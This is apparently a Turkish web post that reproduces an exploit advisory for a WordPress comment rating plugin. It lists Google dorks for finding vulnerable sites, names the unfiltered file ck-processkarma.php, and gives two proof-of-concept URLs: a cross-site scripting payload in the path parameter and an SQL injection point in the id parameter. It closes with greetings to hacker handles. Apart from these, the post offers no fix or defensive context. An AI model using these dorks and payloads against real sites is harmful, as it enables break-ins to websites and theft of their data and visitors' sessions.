WordPress Yorum Puanlama SQL Injection ve CSS Açığı
WordPress sürümünde yorum (comment and rating plugin) ve puanlama modülü kullanan web sitesi sahiplerinin etkilendiği açık sayesinde, sql injection ve cross site scriptting mümkün oluyor.
Exploit Kodu :
# Exploit Title: WordPress comment rating plugin multiple Vulnerabilities
# Google Dork: 1- inurl:”/wp-content/plugins/comment-rating/”
# 2- inurl:”/ck-processkarma.php?id=”
# Date: 2/1/2012
# Author: The Evil Thinker
# Contact : Enstene156@hotmail.fr
# Software Link: www.wordpress.com
# Vulnerable plugin: Comment rating plugin
# Tested on: Linux
Details :
the vulnerable file is “ck-processkarma.php”
the script doesn’t filter the input parameters (id “sql”, path “XSS”)
Poc 1 (XSS) :
http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=alert(‘Founded by TheEvilThinker’)&imgIndex=
Poc 2 (SQL injection) :
http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex=
Special Graetz : Zack (DBA-HACKER) , Siper-N , Root-Mar , Anash , H!ch4m , Dr.Unknown , Mario-Gomez , BiiF0 , o Bla mantawel LLista
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